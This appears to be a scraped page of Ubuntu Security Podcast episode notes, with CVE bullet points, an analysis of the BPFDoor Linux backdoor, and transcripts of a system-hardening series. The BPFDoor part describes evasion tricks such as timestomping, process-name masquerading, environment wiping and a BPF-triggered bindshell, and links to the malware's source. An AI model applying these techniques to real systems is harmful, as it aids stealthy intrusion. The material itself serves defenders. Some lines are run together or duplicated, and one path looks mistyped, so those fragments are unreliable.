More Intel CPU issues, including Hertzbleed and MMIO stale data, plus we cover security vulnerabilities and updates for ca-certificates, Varnish Cache, FFmpeg, Firefox, PHP and more.
64 unique CVEs addressed
This week we dig into some of the details of another recent Linux malware sample called Symbiote, plus we cover security updates for the Linux kernel, vim, FreeRDP, NTFS-3G and more.
82 unique CVEs addressed
release_agent
io_uring
kgdb
canonical-livepatch status
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | — | 86.3 | 86.3 | 86.3 | — |
aws-5.4 | — | — | 86.3 | — | — |
aws-hwe | — | — | — | 86.3 | — |
azure | — | 86.3 | — | 86.3 | — |
azure-4.15 | — | — | 86.3 | — | — |
azure-5.4 | — | — | 86.3 | — | — |
gcp | 86.4 | 86.3 | — | 86.3 | — |
gcp-4.15 | — | — | 86.3 | — | — |
gcp-5.4 | — | — | 86.3 | — | — |
generic-4.15 | — | — | 86.3 | 86.3 | — |
generic-4.4 | — | — | — | 86.3 | 86.3 |
generic-5.4 | — | 86.3 | 86.3 | — | — |
gke | 86.4 | 86.3 | — | — | — |
gke-4.15 | — | — | 86.3 | — | — |
gke-5.4 | — | — | 86.3 | — | — |
gkeop | — | 86.3 | — | — | — |
gkeop-5.4 | — | — | 86.3 | — | — |
ibm | 86.4 | 86.3 | — | — | — |
ibm-5.4 | — | — | 86.3 | — | — |
linux | 86.4 | — | — | — | — |
lowlatency | 86.4 | — | — | — | — |
lowlatency-4.15 | — | — | 86.3 | 86.3 | — |
lowlatency-4.4 | — | — | — | 86.3 | 86.3 |
lowlatency-5.4 | — | 86.3 | 86.3 | — | — |
oem | — | — | 86.3 | — | — |
mount.cifs via crafted command-line arguments - used strcpy() to copy the provided IP address after first checking length - but did the comparison using strnlen() which returns the max length even if the string is longer - so the subsequent strcpy() would then overflow
mount.cifs when it spawns a subshell for password input
LD_PRELOAD to ‘infect’ binaries on system
tcpdump etc
This week we cover security updates for dpkg, logrotate, GnuPG, CUPS, InfluxDB and more, plus we take a quick look at some open positions on the team - come join us!
31 unique CVEs addressed
ntfsck tool failed to perform proper bounds checking on filesystem metadata - if could trick a user into running it on an untrusted filesystem image could then possibly get code execution
ntfs-3g-dev package which is not installed by default
io_uring - an unprivileged user can spam requests which would eventually overflow a counter and then could be used to trigger an OOB write -> controlled memory corruption -> privesc
io_uring found by this researcher - https://seclists.org/oss-sec/2021/q2/127
This week we take a look into BPFDoor, a newsworthy backdoor piece of malware which has been targeting Linux machines, plus we cover security updates for Bind, Vim, Firefox, PostgreSQL and more.
32 unique CVEs addressed
https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896
https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/
Malware that has been in the wild for a while (over 5 years)
Reported on by PwC in their Cyber Threats 2021: A year in Retrospect report
Stealthy - allows attackers to backdoor a system for RCE but without opening any new network ports or firewall rules by piggy-backing on existing network facing applications
Uses a BPF filter to watch incoming packets and activate accordingly
Earlier versions are on VT - with lots of other variants too
Even source code too - https://pastebin.com/kmmJuuQP
As I said - stealthy
In more detail:
Copies itself to /dev/shm/kdmtmpflush and then forks to clean itself up
Alters timestamps (timestomp) to a specific timestamp (7:17pm Thursday October 30th 2008)
Creates /bar/run/haldrund.pid to prevent further copies of itself from running
Deletes itself from the /dev/shm/ ramdisk and then exits to leave the forked copy running resident in memory and then uses a BPF filter to watch for incoming traffic to activate
Doesn’t appear to have any particular persistence mechanism but some reports suggest use of crontab or rc/init scripts
By deleting itself from the ramdisk this avoids detection from filesystem
scanners (although processes running from since deleted binaries are a
suspicious sign themselves and can be easily detected since once the
binary is removed the kernel notes this in /proc/self/exe
for the
process)
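A minimal sketch of that detection, assuming root privileges so that every process's /proc/<pid>/exe link is readable:

```sh
# A process whose binary was deleted after launch shows ' (deleted)' on
# the target of its /proc/<pid>/exe symlink - flag any such processes
ls -l /proc/[0-9]*/exe 2>/dev/null | grep '(deleted)'
```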
Renames its argv[0]
so that it looks like other commonly found processes
like dbus-daemon
/ udevd
/ auditd
etc
Also wipes its environ too to try and help hide its activities, however
this again is another suspicious activity and can easily be detected
(e.g. strings
on /proc/$PID/environ
will show as empty which is basically
never normally the case for normal processes)
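Sketching that check in shell (run as root so all environ files are readable; note that kernel threads legitimately have an empty environ and will also match, so they can be ignored):

```sh
# Flag processes whose environment is completely empty - rare for
# normal userspace processes, and one of the signs BPFDoor leaves
for p in /proc/[0-9]*; do
  if [ -r "$p/environ" ] && [ -z "$(tr -d '\0' < "$p/environ")" ]; then
    echo "suspicious: PID ${p#/proc/} ($(cat "$p/comm" 2>/dev/null))"
  fi
done
```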
BPF filter inspects either ICMP, TCP or UDP packets and then if it has a special magic value in the first couple bytes it passes into the main packet processing routine
bindshell masquerades its process name to look like postfix as well as
setting a specific environment too (including HISTFILE=/dev/null
)
Then attacker has full access to the machine (as the user)
Reasonably advanced malware
What is not clear is the initial compromise vector, and how the attackers then privesc from that to gain the privileges needed to load a BPF filter on a raw socket
xscreensaver - but this vuln is specific to Solaris platforms
Why it is important to keep systems updated with latest patches etc.
Ubuntu gets pwned again at Pwn2Own Vancouver 2022, plus we look at security updates for the Linux kernel, RSyslog, ClamAV, Apport and more.
57 unique CVEs addressed
This week we bring you part 2 of our look at the new Ubuntu 22.04 LTS release and what’s in it for security, plus we cover security updates for DPDK, OpenSSL, Cron, RSyslog, Curl and more.
37 unique CVEs addressed
c_rehash script through shell-metacharacters - but no privilege escalation so only get whatever privileges the script is executing under (c_rehash is used to create symlinks named as the hashes of certs etc when importing a cert into a cert store so it can then easily be looked up via its hash value as the filename)
(as the syslog user only)
ChangeCipherSpec messages in TLS 1.3 - remote client could crash a server by sending multiple of these
iptables command to configure firewall rules etc but they will then be loaded into the kernel’s nft backend rather than xtables
nft to directly configure the nft backend which supports more advanced rule types
-fanalyzer
$SRANDOM vs $RANDOM - $SRANDOM sources from /dev/urandom and hence is not reproducible / deterministic - ie. is actually more truly random
Microsoft’s Nimbuspwn sets the Linux security media ablaze but where there’s smoke there’s not always fire, plus we bring you the first part of a 2 part series looking at some of the security features in the latest Ubuntu 22.04 LTS release.
reproducible / deterministic - ie. is actually more truly randomMicrosoft’s Nimbuspwn sets the Linux security media ablaze but where there’s smoke there’s not always fire, plus we bring you the first part of a 2 part series looking at some of the security features in the latest Ubuntu 22.04 LTS release.
92 unique CVEs addressed
networkd-dispatcher which could be used to get RCE
systemd-network user (since this user is the only one which can bind to the right dbus name org.freedesktop.network1)
apt / apt-get during package install / upgrade so this sounds like a common scenario that would affect most users (instead of say epmd which is the erlang port mapper daemon, so unless you are running erlang applications you would not be affected by that)
systemd-network user - this is definitely not the case for standard Ubuntu - since apt is very clear to run them under the _apt user account purposefully to restrict their privileges
networkd-dispatcher - since they are not able to be exploited in standard configurations they are not a real threat to most users
networkd-dispatcher but didn’t involve any downstream distros - as suggested by Julian Andres Klode from the Ubuntu Foundations team (and upstream apt maintainer) - perhaps Microsoft should have pre-disclosed this issue to the linux-distros mailing list - if they had done so this likely would have been assessed and clarified earlier so that Microsoft could have more properly understood the extent of the vulnerabilities which they discovered and the internet could have avoided another brief panic scenario
Ubuntu 22.04 LTS (Jammy Jellyfish) is officially released 🎉 and so this week we take a quick look at the new features and enhancements, with a particular focus on security, plus we cover security updates for the Linux kernel, Firefox, Django, Git, Gzip and more.
58 unique CVEs addressed
release_agent not properly restricted -> privesc
This week we bring you the TL;DL (too-long, didn’t listen 😉) version of Camila’s recent 4-part Ubuntu hardening series, plus we look at security updates for Twisted, rsync, the Linux kernel, DOSBox, Tomcat and more.
48 unique CVEs addressed
/proc (e.g. /proc/self/mem) - could then allow an application to get code execution - added checks on file access to prevent this
Hello listener! This is going to be a quick episode and so I will make a quick introduction for it. During our last four episodes we talked about how to harden our Ubuntu systems, making them more robust…and dare I say it? More secure! However, four episodes is quite a lot, and not everyone is willing to listen to several minutes of my awesome voice, so I am here today to fix that and give you an episode that is a summary, a “Too Long, Didn’t Listen” if you will, of those previous four episodes. So let’s get going because today is no day for delays, and let’s talk, shortly and succinctly, about things you can do to harden your Ubuntu system.
Let’s start with hardening measures you can apply to your system whilst installing it:
(1) Encrypt your disk. Input and output operations might take a little while longer to happen, but if your hardware can take it, that might not even be an issue. Do remember though that every time the device is shut down, when you turn it on, you will have to decrypt the disk before using the operating system, which in turn means: inputting a password to get things going. So maybe only do this if you have a system where this won’t be a hindrance. Oh, and don’t lose your password, or else, you’ll end up with a disk full of pretty, but uninterpretable, characters and no functional operating system at all!
(2) Create a swap partition or a swap file to get the most out of your RAM. Availability is also a cyber security concern you should have, and providing your system with some swap space not only buffs it by giving it more RAM memory to work with - even if it is only a wannabe RAM - but it also allows you, as a system administrator, to be better prepared to face memory issues that might come to haunt your system, since you can monitor your swap space usage and use this as reference to know if your system might be feeling a little bit overloaded. Avoiding unnecessary crashes just got a whole lot easier. Tchau, OOM manager! A side note, though: check your system requirements so that you set up swap in a way that fits your system’s needs, or else, instead of making your device work better, you will only make it work harder.
(3) Partition your system! Put /var and /home in different disk partitions and stop all those log file backups or kitty videos from flooding your disk space and forcing your critical processes to stop execution because there is no space left in the system. Ooops. Maybe we should also take some time to update the log backup script and to remind users that the server is no place to store videos…even if they are adorable. And while you are at it, maybe also give /tmp its own partition. A world-writable /tmp is a well known attacker target, and grounding it and sending it to the corner to think about its bad behavior might be a good way to avoid possible attacks. Especially considering that different partitions can be set to have different permissions.
(4) Strong passwords. This shouldn’t even be in this list because you already use strong passwords when setting up your users during install, right? What? I’m not nervous because I definitely need to change my password from ‘security2022’ to something a lot better, you are!
With an installed system, our hardening journey is far from over, as we now need to set everything up securely before getting our service and its related applications running. How to proceed?
(1) Ubuntu does not enable a password for the ‘root’ user for a reason, and so, recommendation number one is: just leave ‘root’ and its password alone. Leave it there hibernating with all of its amazing and yet destructive power over the system. No ‘root’ user password, no successful brute force attacks, not even through SSH. An attacker in a regular user shell is a lot less scary than an attacker in a ‘root’ shell. Use ‘sudo’ instead, and configure ‘sudo’ permissions for your users appropriately in the /etc/sudoers file. YOU get to CHOOSE what commands each user can run as the superuser, so take your time to set these up. Give each user the least they need to perform their tasks, and stay safe. I know…it’s amazing…you get to CONTROL what your users are allowed to do in your system. “What? Has this always existed?” Yes, my friend, yes it has, so it’s about time you start configuring it properly.
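As a concrete (and entirely hypothetical - ‘alice’ and the service name are placeholders) sketch of what such a least-privilege sudo rule looks like:

```sh
# Edit sudo rules safely - visudo syntax-checks the file before saving:
#   sudo visudo -f /etc/sudoers.d/alice
# Allow alice to run exactly one command as root, and nothing else:
alice ALL=(root) /usr/bin/systemctl restart nginx
```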
(2) Use SSH instead of Telnet for remote login, because you are NOT a caveman that requires your data to be transmitted over the network in plain text. Yes, cavemen knew not to use Telnet and they also knew that even when using SSH they had to properly configure it before using it, or else, not even encryption would save them. If you doubt me, go do your research…this is 100% historically accurate, my fingers are definitely not crossed behind my back as I say this. Disabling root access through SSH, using SSH2 instead of SSH1, setting up allowlists and denylists for users and IP addresses, and setting a maximum number of login attempts were all of the basic things cavemen on our planet did when setting up their SSH servers whilst sitting around their very cozy and newly discovered fires. Plus, they also set up private key login for their SSH servers, not because they were too lazy to type in their passwords - …nooooo, they had passphrases for their keys - but instead because it is a well-known and trusted way to verify the identity of whoever is trying to connect to the server. Passwords by themselves sometimes just aren’t enough. So…if cavemen were able to discover fire AND properly set up their SSH servers…then it is more than your obligation to at least do the same, if not more. Oh, and don’t forget to properly set permissions in the ‘authorized_keys’ file…I mean…come on guys…properly setting permissions in a very important file in your OS is a lot easier than hunting, foraging, and surviving in the menacing prehistoric Earth environments, and that’s why cavemen did it as well.
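A sketch of what those caveman-approved settings look like in /etc/ssh/sshd_config (the user name is a placeholder; modern OpenSSH only speaks SSH2, so no Protocol line is needed):

```sh
PermitRootLogin no           # no direct root logins over SSH
PasswordAuthentication no    # private key login only
PubkeyAuthentication yes
MaxAuthTries 3               # cap failed login attempts per connection
AllowUsers alice             # allowlist of accounts permitted to log in
```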
(3) Can we really call it hardening of the system if we don’t consider hardening of the one and only, the star of the show, the kernel itself? The ‘sysctl’ command in your Ubuntu system is there to attend to all of your kernel hardening needs, allowing you to define kernel configurations, but not requiring you to reboot the machine to get them to stick. With ‘sysctl’ you can do so many things that I wouldn’t be able to summarize it all here, and I am already in a pinch because I am very bad at making my scripts short, and I need to keep this one short. So, for now, I will give you a little taste of what ‘sysctl’ can do to get those curiosity juices flowing! Restrict users allowed to read kernel logs and block IP packet forwarding for devices that are not routers. Was I able to make you interested? Well, I know I won’t get the answer to that, but what I do know is that both those measures I mentioned can already take you a long way when you think of hardening your system, and they are two amongst many available…sooo, get those fingers typing and those kernel options researched and you, my friend, are on the right path to getting your system hardened!
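To make those two teasers concrete, here is how they look as sysctl settings - a sketch, to be persisted under /etc/sysctl.d/ once you are happy with them:

```sh
# Restrict reading the kernel log to privileged users
sudo sysctl -w kernel.dmesg_restrict=1
# This machine is not a router, so refuse to forward IP packets
sudo sysctl -w net.ipv4.ip_forward=0
# Make both survive a reboot
printf 'kernel.dmesg_restrict = 1\nnet.ipv4.ip_forward = 0\n' | \
  sudo tee /etc/sysctl.d/99-hardening.conf
```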
(4) Setup a host based firewall. They are efficient in blocking unwanted network traffic, they can be configured to your host’s specific needs and they are portable, since, when the host migrates, its firewall goes with it. Plus, it’s very easy to set up, you can use the Ubuntu tool known as the Uncomplicated Firewall (‘ufw’) to help you, and it gets you started on protecting yourself against the harsh, harsh Internet ecosystem that lies out there. Oh, and don’t even try to argue with me and tell me about your network based firewall and how it already does the job for you, because I just discussed it in the long version of this series, so to make it short, I will say one simple word to get my point across once again: layers!
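A minimal ufw starting point, as a sketch - deny everything inbound by default, then open only what you actually serve (SSH here, as an example):

```sh
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow ssh        # or 'sudo ufw allow 22/tcp'
sudo ufw enable
sudo ufw status verbose   # confirm the resulting rule set
```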
(5) Remember when we were talking about partitioning your disk/filesystem? Well, let’s kick that up a notch and configure each partition individually, setting permissions and defining usage configurations for each one of the different partitions in our disks. We are all unique in this huge world we live in, and so are our partitions. Treat them with the love, care and individuality that they deserve and they shall return all of your efforts in the form of a more secure system. If you have a network shared partition, for example, why not set the ’noexec’ option for this partition, and prevent executables from being run from an area in your device that could be considered untrustworthy at best and devastatingly dangerous at worst? Don’t trust users, I always say, especially when they come for your files through the network. Another good option would be to set a partition as read-only, if it is a partition that requires no more permissions than this. The /etc/fstab file is the one you can go to in order to set all of these configurations, which will be applied at mount time, during system boot.
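Two illustrative /etc/fstab entries in that spirit - the device name and mount points are placeholders for your own layout:

```sh
# Hypothetical read-only data partition
/dev/sdb1  /srv/share  ext4   ro                            0  2
# /tmp with no setuid binaries, no device nodes, no direct execution
tmpfs      /tmp        tmpfs  defaults,noexec,nosuid,nodev  0  0
```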
(6) Don’t ignore your logs. Setup a nice logging system for your device. Use syslog or journal to do so, and yeah…sure…thank me later, I won’t complain if you do. But seriously though, how can you expect to maintain and troubleshoot a device if you don’t know what is happening with that device? And how do you expect to keep a system secure if you can’t maintain and troubleshoot it? Yes, logs can be annoying to look at and analyze sometimes, but that is why utilities such as ‘syslogd’ and ‘journald’ exist to help you search through those logs. Syslog even allows you to send all of your data to a centralized server, which can then focus exclusively on processing log data that it gets from various network devices. You have all of that goldmine of data at your feet and all you need to do now is use it. Ubuntu has the tools that allow you to do that, but it doesn’t have the will…that, my friend, needs to come from you. So to show how important it is to set up and use logs, I will end this suggestion with a quote, because everything that includes quotes is usually considered important, right? “Knowing yourself is the beginning of all wisdom” - Aristotle. There, now go get some logging setup.
Ok. Next step is installing your applications so that you can get your service up and running. I am not even going to go into detail about using secure software, setting up this software including security configurations, and using encryption when sending data through the network, because that is obvious enough, right? If not…then I am sorry to tell you, you might need to listen to the long version of this. I will go into detail though, not much, but a little bit (if you want ‘much’, go listen to parts 1, 2, 3 and 4), on what you can do after you set up your service, and on what you can do until forever to keep your hardened system from going soft on you. So let’s jump in.
(1) One or two network services per device!!! Don’t make your server a jack of all trades, because that is a recipe for a hack of all spaces. If you are going to use the network to expose your service, maybe incorporate it as a part of the service’s architecture as well. Have more than one device running server software which makes up a part of the entire provided service, and have those devices communicate with each other through the network. Different server applications in different devices will isolate each relevant component and avoid a complete meltdown of the service in general, in case something is compromised. Divide and conquer. It’s like we don’t say this enough.
(2) Close unused ports in your system and disable unnecessary services and daemons. By not doing so you are only increasing the attack surface for your system, meaning, you are giving more possibilities for an attacker on how to attack you. Less is more, and the bare minimum should be enough. Be sure new installs and new updates don’t open up ports you don’t want to be opened and don’t bring in new files, scripts or executables that might compromise you. Keep a continuous eye on everything that is running in the background. Just because you can’t see it, it does not mean it can’t be hacked.
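In practice that audit might look something like the sketch below (the unit being disabled is a placeholder for whatever you find that you don't need):

```sh
# What services are running right now?
systemctl list-units --type=service --state=running
# Switch an unneeded one off, both now and at every future boot
sudo systemctl disable --now some-unneeded.service
```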
(3) Check your file permissions and change them if necessary! Defaults were made to be overwritten and you don’t need 777 files lying around in your system anymore, do you? Know your resources and set permissions accordingly. Correctly setting up users and groups is implied here, especially considering that users and groups will define who can and can’t access a file in the system. Plus, disable the setuid and the setgid bit for executables that don’t need it. When researching for privilege escalation techniques in Linux, “Find setuid binaries in the system” is the first technique to show up, so that should be enough of a warning to you that an executable should only be allowed to run as another user in case it is extremely…and let me say that again with emphasis: EXTREMELY necessary, or else, it might just be another day, another root shell for some random attacker.
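To hunt those down, a sketch - the path in the last line is a placeholder for whatever you decide really doesn't need the bit:

```sh
# List every setuid/setgid file on the root filesystem
sudo find / -xdev -type f \( -perm -4000 -o -perm -2000 \) -ls 2>/dev/null
# Strip the setuid bit from a binary that doesn't need it
sudo chmod u-s /path/to/binary
```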
(4) Install some third party software to help you keep your system safe. “We are all in this together”, as a song from a teen musical I am totally not ashamed to admit I watched too much when I was a bit younger used to say, and that applies to the cyber security community. Software that can help you better the security in your devices is plentiful out there, and here, today, I will mention a few of them that you can check out and possibly use in order to harden your Ubuntu OS even more. Obviously, since this is a summary, we are doing this the fast way, so let’s get listing: Fail2ban, Snort and Suricata for intrusion detection and prevention; the Google PAM package, which allows implementation of 2-factor-authentication for your Ubuntu users; ClamAV, for malware detection; the Mozilla TLS configuration generator, to help you securely generate configuration files for well known applications; and finally, AppArmor, or possibly SELinux, for Mandatory Access Control that will complement the Discretionary Access Control you already set up with your file permissions earlier.
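For the AppArmor entry specifically, a quick sketch of inspecting and enforcing profiles (aa-enforce ships in the apparmor-utils package; the tcpdump profile is just an example of one that exists on a stock Ubuntu install):

```sh
sudo aa-status                    # which profiles are loaded, and in which mode
sudo apt install apparmor-utils   # brings in aa-enforce / aa-complain
sudo aa-enforce /etc/apparmor.d/usr.sbin.tcpdump   # put a profile in enforce mode
```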
To finish this all off, don’t forget to keep your packages up-to-date, to use shred instead of rm to get rid of files containing sensitive data in your system, and to continuously go back and reconsider all of the previously mentioned points, so that your system can securely keep up with changes that are being made around it. The world won’t stop spinning and technology won’t stop evolving, so your server cannot afford to not be maintained and updated on a regular basis, or else, all of your initial hardening will be for naught.
That is all for today friends, and I hope you enjoyed it. It was a quick one, but it was an episode made with love. Feel free to share your thoughts on any of our social media platforms and for now I bid you farewell and until next time! Bye!
It’s an off-by-one error in the podcast this week as we bring you part 4 of Camila’s 3-part Ubuntu hardening series, plus we look at security updates for Thunderbird, OpenVPN, Python, Paramiko and more.
47 unique CVEs addressed
urllib.parse mishandled URLs with embedded newlines - possible to bypass regular checks leading to possible URL/request injection etc
-fuse-ld=gold to gcc)
Hello listener! Welcome back to our Ubuntu hardening journey in the Ubuntu Security Podcast. Hey! I know what you’re thinking: I can’t count. I said this would be a three part series…and well…here I am in a fourth episode talking about this again. You could also be thinking “Hey, you’ve got the wrong title there…what’s the new topic for this episode?”, and should this be any other situation, I might’ve said you are right to either one of these two assumptions because I can be a bit of a scatterbrain sometimes. But not this time! I am here today once again talking about Ubuntu hardening because, hey…cyber security is a continuous effort. Remember that? And you know what also is a continuous effort? Learning and becoming wiser, and in our journey to do so, it is very likely that we will make a few mistakes here and there, myself included. Ok, ok, I’ll stop rambling and saying pretty words to distract you from the real deal here: I might’ve made some mistakes…Ooops! I apologize. Because yes, I do know about cyber security, but I am definitely not the master of all when it comes to it. So, in the past three episodes there were some sentences here and there that might have been a little bit incorrect, and some other sentences that might have been forgotten to be said. BUT WORRY NOT! I am here today to fix this. I got a review of my script for the last three episodes from another one of the security team members, and they gave me a lot of helpful feedback on what I said and on what I suggested to you all. Since I had already recorded the other episodes and my laziness spoke a little louder than my willingness to spend the day re-editing audio files, I decided to instead bring a new episode to you. Coincidentally, recording a part 4 to a previously established 3 part series really resonates with the vibe that is the hardening process of an operating system: we want to always review our work, and fix mistakes whenever possible. Maintain and evolve, even if we do hit a few bumps on the road and make some mistakes along the way. We are human after all, and even if the computer isn’t, all that it does is do what we ask of it, so…yeah! Enough introductions, let’s move on to the meat and potatoes of this episode and right some wrongs! Oh…actually…I don’t think it is really necessary to mention this…but there is always that one person, so: listen to the other episodes if you haven’t yet. I can’t really fix something that you don’t even know is broken.
Ok, point number one that was brought to my attention: remember when we were talking about the swap partition in part 1? Well, it is a valid solution for all the reasons that I mentioned there, but it is not the only one. Drumroll please, as I introduce you all, if you don’t already know it, to the swap file. TADA! The swap file, as the name suggests, is a file in your system that will serve the same purpose as a swap partition. However, instead of being configured as a separate partition of your disk, a swap file is created under the root partition in your system and you simply nudge the OS to remind it that that specific file should be used as swap whenever necessary. Neat, right? Especially because resizing swap files is a lot easier than resizing an entire swap partition. A LOT easier. Using the ‘fallocate’ command or the ‘dd’ command will help you get a swap file ready in case you wish to use this method of swapping instead of creating an entire new partition during install, or in case you forgot about it during install. Use the ‘mkswap’ tool to tell Ubuntu that the new file is a swap space and enable the swap file with ‘swapon’. To finish it off, and make changes permanent, add information on the swap file to ‘fstab’. Remember to correctly set permissions in this swap file, as, even though it is a swap entity, it is still a file. Only the root user should be able to write to that file or read from it, so get your ‘chmod 600’ ready for that. The conclusion here is: both a swap partition and a swap file will serve the same purpose, and they are both located on disk, so not much to compare on that front. However, if you are looking for something more flexible, stretchy, if you will, consider using the swap file. It will help you out with your maintainability needs, and with adjusting to changes in the future, especially if these changes involve increasing the size of the swap, or decreasing it due to hardware changes applied to your device, or any other type of related changes. I do stress though, hopefully enough that you are just being reminded of this here: do this if it suits YOUR needs. Maybe you already have a swap partition, and it is ok with you for it to have an immutable size until the end of eternity, and that is great! You do you. What is important for you to take away here is that I am giving you another option, one that might better suit your needs, or not, but I am not the one to decide that for you.
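Putting the whole recipe together, as a sketch (4G is an arbitrary size - match it to your own requirements):

```sh
sudo fallocate -l 4G /swapfile   # reserve the space ('dd' works too)
sudo chmod 600 /swapfile         # root-only read/write, as stressed above
sudo mkswap /swapfile            # mark the file as swap space
sudo swapon /swapfile            # start using it immediately
# Make it permanent across reboots:
echo '/swapfile none swap sw 0 0' | sudo tee -a /etc/fstab
```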
Next up, let’s talk about that ‘hidepid=2’ suggestion I made in part 2, shall we? This suggestion came up when we were talking about fstab, and I was telling you about ways to protect your /proc directory from the prying eyes of possibly malicious users. Well, it unfortunately doesn’t work when you have systemd installed, which is the case for Ubuntu. Whewhe. So yes, blame me for relaying possibly incorrect information to you. I am deeply sorry…but please don’t cancel me for it. There are a few bug threads that mention this error and a lot of proposed solutions given by the community can be found in the various comments. I will not go into too much detail on those here because it might be a bit difficult to get the actual solution through without any visual aid, but I do encourage you to do some research on this, and maybe apply one of the suggested alternatives should it be adequate for your system. Sorry once again for giving you a hardening tip that would cause an error in your system, but hopefully the solutions out there will allow you to get right what I initially got wrong. I’ll try to get some links containing some of these solutions added to the podcast notes in order to help you out, and in order to atone for my mistakes. I’m sorry, I’m sorry once again. Ok, I’ll stop now.
Point number three: I told you to love your logs and embrace your logs during part 2 of this series. The computer pours out its innermost secrets to you and you decide to ignore it? Well…I kind of ignored it a little bit as well, because I talked so much about ‘syslog’ and all of its log files that I forgot about another oh so very important member of the logging squad: ‘journald’. If your Linux system has ‘systemd’, it does have ‘journald’, and therefore, if you are using Ubuntu, you most likely have it too. Since ‘journald’ stores data in binary format, the usual way of accessing the data it collects is not recommended here, as our brains have still not yet evolved to immediately read and process unreadable characters when looking at a sequence of those characters. There are no plain text log files here. Instead, if you want to check out all of the logging goodness that ‘journald’ can provide, and expose all of your device’s secrets, you have to use the ‘journalctl’ utility. I am pretty sure this name is familiar to you, as most times when you have a service issue in Ubuntu or a system issue in general, it recommends you check out the output of ‘journald’ by typing in a shell ‘journalctl -x’. ‘Journald’ is a very interesting logging tool and it can allow you to troubleshoot your system very efficiently. It tracks each log to a specific system boot, for example, and this means that you can check logs considering only data connected to a specific boot instance when using the ‘-b’ option. So, if you have a situation where you know that the issue happened the last time you turned on your computer, instead of checking all of the log, you can narrow it down and try to find your problem in fewer lines of log data instead. You can also filter log data based on a time range, based on a specific service, based on a specific user or based on message priority level. Which one is better to use between ‘syslog’ and ‘journald’, you ask? It depends on your needs. Advantages of using ‘journald’ include the fact that it structures data in such a way that searches can be optimized, plus, it indexes data, meaning that lookup operations of the log files will happen in a much faster manner than they would when searching for information in plain text files. Filtering is also easier with ‘journald’, as seen by all of the options I mentioned previously that you can use together with ‘journalctl’. With ‘syslog’ and all its different plain text log files, it might be a little bit more difficult or troublesome to find exactly what you are looking for, and even correlate log information without having a third party software to maybe assist you with this job. When searching through ‘syslog’ logs we usually end up using ‘grep’, our handy-dandy text file search tool, but unfortunately, ‘grep’ will not take into account the context of a situation. So, when searching through ‘syslog’ logs, instead of a simple one line command you would type if using ‘journalctl’, you create a huge multiline beast with a lot of pipes to get a coherent and valuable result out of the many ‘syslog’ files you wish to have analyzed. Another advantage of ‘journald’ is that ‘journald’ has permissions associated to its log files, so every user is able to see their own log without actually being able to see output that would be exclusive only to root, for example, said users needing to prove their privileged identity before accessing this other sensitive data about the system. 
Therefore, regular users are able to troubleshoot using ‘journald’ logs, but at the same time, information that should not be exposed to regular users for one reason or another is protected. With ‘syslog’ it will all depend on permissions associated with the log text files, and these will include ALL of the information for one specific log source, so it won’t be every random user that will have the opportunity to possibly use log data to solve their issues, unless you allow said random user to actually read logs in their entirety. Talking a bit about possible disadvantages related to ‘journald’: ‘journald’ does not include a well-defined remote logging implementation and, therefore, is not the best option to consider when you need to build a central logging server, whereas ‘syslog’ allows that to happen very well, since there is even a same name protocol which is used to send messages to a main log server running a ‘syslog’ instance. Plus, ‘journald’ considers only information from Linux systems, while ‘syslog’ encompasses more, such as logs generated by firewall devices and routers. This means that correlation between the logs of the different devices in your infrastructure might be made more efficient when you indeed have a centralized ‘syslog’ server to gather all of that information, especially considering that it is possible to send ‘journald’ data to an already existing ‘syslog’ implementation, as ‘journald’ retains full ‘syslog’ compatibility. One of the issues we find with this though, is that most advantages that come with ‘journald’ are lost when such messages are sent to the centralized ‘syslog’ server, as this server, as the name implies, will include a ‘syslog’ implementation instead of a ‘journald’ one, this ‘syslog’ implementation recovering, storing and processing messages as a regular ‘syslog’ instance would…so, no indexing and no optimized data reading and filtering. The other possible issue is that ‘journald’ needs to send its data to a local ‘syslog’ server, and this server will then send that data to the remote one. Having two tools doing the same logging work might not be the most ideal thing for you or your infrastructure, so do take that into account when setting up your logs and your whole logging system. For this reason and the other reasons mentioned, ‘journald’ ends up being more “host-based” than ‘syslog’. Therefore, I once again ask the question: which one is better to use? Maybe it’s ‘journald’ in case you have one host only, maybe it’s ‘syslog’ if you have an entire infrastructure and a centralized log server with third party software that processes all information it gets, or maybe it’s even both, since, as we already discussed in previous episodes, an extra layer of protection is what will help you build up your cyber security walls of defense more efficiently, especially when you consider that you already have ‘journald’ installed by default in your system.
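A few of the ‘journalctl’ filters mentioned above, for reference (ssh.service is just an example unit):

```sh
journalctl -b                               # messages from the current boot only
journalctl -b -1 -p err                     # errors from the previous boot
journalctl -u ssh.service                   # one specific unit
journalctl --since "09:00" --until "10:00"  # a time window
```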
Going on to point number four: when installing tools such as Rootkit Hunter, be aware of possible false positives. It is always useful to have tools that scan your system for you, and point you in the direction where issues might be, however, it is interesting to confirm that the issue database used by such programs is updated and well matched to your system in order for results to be actually useful. So keep two things in mind: that tools such as Rootkit Hunter exist and can be very helpful, and that, even though they can be helpful, they can also not be if they are out-of-date and just end up flooding you with false positives that will then lead you on a wild goose chase that generates nothing of value to you or your system. Also, do be careful about installing programs such as vulnerability scanners that can be later on used by attackers themselves to find flaws in your system. If you’ve used it and no longer need it installed, maybe remove it until it is once again necessary…after all, even security tools increase the attack surface of your system, and they themselves might have vulnerabilities related to them that could be exploited by someone with enough knowledge of it. Finally - and me saying this might sound unnecessary because it should be obvious, but I do say it because there is always that someone out there…right? - don’t think that a scan performed by ONE single scanning tool is enough to guarantee security of a device, especially when we consider tools that do need to rely on previously known hashes, or rules, or sets of steps, in order to identify a possibly malicious entity in a system. That is because attackers are always trying to circumvent these tools by using digital fake mustaches, and, sometimes, these disguises are enough, as are a certain superhero’s glasses. I mean…how can people not know they are the same person? Unfortunately, this major oversight might happen sometimes with your security tools as well, so knowing this is key in order to actually build a truly secure system. By knowing, you also know that said tools should only be a part of a bigger, LAYERED strategy you use to harden your system. Agreed?
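A typical Rootkit Hunter run, sketched - refreshing its data files first is exactly what keeps the false-positive flood down:

```sh
sudo apt install rkhunter   # the package behind the 'Rootkit Hunter' name
sudo rkhunter --update      # refresh the data files it checks against
sudo rkhunter --check       # run the actual scan
```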
